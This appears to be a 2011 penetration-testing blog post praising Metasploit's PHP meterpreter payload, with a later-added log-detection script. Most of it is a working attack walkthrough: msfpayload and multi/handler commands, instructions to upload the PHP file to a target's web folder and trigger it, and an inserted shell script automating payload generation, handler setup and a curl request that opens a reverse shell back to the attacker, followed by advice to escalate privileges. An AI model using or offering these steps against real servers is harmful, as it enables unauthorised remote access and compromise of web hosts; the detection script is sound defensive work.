Thursday, February 24, 2011

Ode to the PHP meterpreter payload

The reason why I am writing this post is that I want to give credit to this incredible piece of code that made my life easy in one of my pentests. So, here we go...

The meterpreter payload is one of the most popular payloads in the Metasploit Framework. There are many reasons for that, but the main one is that it lets you run commands and interact with the compromised host without spawning a separate shell process, which is incredibly easy for a sysadmin to spot. This payload was created, as far as I know, by Carlos Perez (darkoperator), who on top of that has written a number of scripts to escalate privileges, modify operating system services or even maintain a persistent meterpreter connection.

Although this payload has been around for a long time, a great way of taking advantage of it is its PHP form (created by Egypt). When you attack web sites or servers from the Internet it is uncommon to find an open service with an exploitable vulnerability: the ports on Internet-facing servers are usually filtered or blocked by a firewall, which makes exploitation from the outside harder. This is where meterpreter in its PHP form comes in. It is a lot more common to find a web application that lets registered users upload files, or a SQL injection that lets you write a file into /tmp or into the site's /images folder. For the payload to run, the file has to end up somewhere the web server will hand to the PHP interpreter: a file in a web-reachable folder like /images can be requested directly, while a file in /tmp is only useful if you also have an include vulnerability to pull it in. A flaw like that on any Internet-facing web server is incredibly dangerous even if you never use the meterpreter payload. However, this payload will make your life so much easier! Here is how to run it.
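As an added example that is not part of the original post, here is what the technique looks like from the server side: a small POSIX shell check run over a few constructed Apache combined-log lines (not real traffic) that flags requests for .php files under directories that should only hold static uploads. The directory names are assumptions; adjust them to the site's layout.

```sh
#!/bin/sh
# Added example, not from the original post. Flags requests for PHP files
# under directories that should only ever serve static uploads: exactly what
# a request for an uploaded PHP meterpreter looks like in the access log.

# Constructed Apache combined-log sample (not real traffic).
SAMPLE_LOG='198.51.100.7 - - [24/Feb/2011:10:12:01 +0000] "GET /images/logo.png HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Feb/2011:10:12:09 +0000] "POST /upload.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Feb/2011:10:12:15 +0000] "GET /images/my_m3t3rpr3t3r.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Feb/2011:10:13:00 +0000] "GET /images/avatar.php.jpg?x=1 HTTP/1.1" 200 800 "-" "curl/7.21.0"
198.51.100.7 - - [24/Feb/2011:10:14:30 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'

# Directories that are writable through the application and must never
# execute PHP (assumed names; adjust to the site's layout).
STATIC_DIRS='^/(images|uploads|files|tmp)/'

# Read combined-log lines on stdin and print the ones whose request path is
# under a static directory and names a .php file. ".php.jpg" is matched too:
# with a careless AddHandler directive Apache still runs such files through PHP.
find_php_in_static_dirs() {
    awk -v dirs="$STATIC_DIRS" '
        {
            path = $7
            sub(/\?.*/, "", path)          # drop the query string
            if (path ~ dirs && path ~ /\.php(\.|$)/)
                printf "%s %s %s %s\n", $1, $4, path, $9
        }'
}

# Convenience wrapper that runs the check over the constructed sample.
detect_sample() {
    printf '%s\n' "$SAMPLE_LOG" | find_php_in_static_dirs
}

detect_sample
```

Run against a real log with `find_php_in_static_dirs < /var/log/apache2/access.log`; the two sample hits are the uploaded payload itself and a double-extension file, while `/index.php` and `/upload.php` are ignored because they live outside the static directories.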

Create the payload with your external IP address (LHOST here is the address the target will connect back to, so it must be reachable from the target):

msfpayload php/meterpreter/reverse_tcp LHOST=MY_EXTERNAL_IP LPORT=4444 R > my_m3t3rpr3t3r.php

Start msfconsole and run multi/handler to receive the connection back to your machine. If your machine has a local firewall you will have to allow incoming connections on the port you chose, in this case 4444. If it sits behind a NAT router, forward that port as well; in that case the handler's LHOST is the address to listen on (0.0.0.0 works), not the public IP you put in the payload.

msf > use exploit/multi/handler
msf > set PAYLOAD php/meterpreter/reverse_tcp
msf > set LHOST MY_EXTERNAL_IP
msf > set LPORT 4444
msf > exploit -j -z

Now upload my_m3t3rpr3t3r.php to a folder on the target that you can reach from the Internet; on a typical Apache box that is something like /var/www/images/. Then request the file from the target server to execute the payload (assuming you uploaded it to the images folder):

http://MY_TARGET.com/images/my_m3t3rpr3t3r.php

If everything works as expected you should receive a connection back to your computer, giving you a meterpreter session that runs commands on the server as the web server's unprivileged user (e.g. www-data). Keep in mind that the PHP meterpreter is a reduced version of the native one (it cannot migrate into another process and offers only a subset of the usual commands), and that the HTTP request you made stays open for as long as the session lives. After that you can try to escalate privileges with a local exploit or any other trick you know.
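The whole procedure above wrapped into one POSIX shell script, as an added example rather than anything from the original post. It assumes a 2011-era Metasploit with msfpayload and msfconsole on PATH and that the file lands in the target's /images/ folder; uploading it is left to you, since that depends on the flaw you found.

```sh
#!/bin/sh
# Added example, not from the original post: the steps above as one script.
# Assumes msfpayload/msfconsole are on PATH (2011-era Metasploit) and that
# you upload the generated file to the target's /images/ folder yourself.

# Command line that generates the PHP payload. LHOST here is the address the
# target will connect back to, so it must be reachable from the target.
payload_cmd() {
    printf 'msfpayload php/meterpreter/reverse_tcp LHOST=%s LPORT=%s R' "$1" "$2"
}

# msfconsole resource file for the handler. LHOST here is the address to
# listen on; behind a NAT router listen on 0.0.0.0 and forward the port.
# ExitOnSession false keeps the handler up after the first session arrives.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j -z
EOF
}

# URL that triggers the uploaded file (assumes it landed in /images/).
trigger_url() {
    printf 'http://%s/images/%s' "$1" "$2"
}

# usage: sh run.sh EXTERNAL_IP PORT TARGET_HOST [FILENAME]
main() {
    ext_ip=$1; port=$2; target=$3; name=${4:-my_m3t3rpr3t3r.php}

    # 1. generate the payload file
    eval "$(payload_cmd "$ext_ip" "$port")" > "$name" || exit 1
    echo "payload written to $name"

    # 2. write the handler resource file; start it in another terminal with
    #    'msfconsole -r handler.rc' so you can interact with the session
    handler_rc 0.0.0.0 "$port" > handler.rc
    echo "handler resource file written to handler.rc"

    # 3. the PHP stager connects back as soon as it runs and gives up if
    #    nothing answers, so only trigger it once the handler is listening
    printf 'upload %s to the target, start the handler, then press Enter: ' "$name"
    read -r dummy

    # The request stays open for as long as the session lives, so do not
    # wait for curl to return.
    curl -s "$(trigger_url "$target" "$name")" >/dev/null 2>&1 &
    echo "triggered $(trigger_url "$target" "$name"); check msfconsole for the session"
}

if [ "$#" -ge 3 ]; then
    main "$@"
fi
```

The split between `payload_cmd` and `handler_rc` is deliberate: the two LHOST values mean different things (connect-back address versus listen address), and mixing them up is the most common reason the session never arrives.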

Again, I hope this helps someone.

P.S. Thanks again to the Metasploit team for sharing this!

c4an.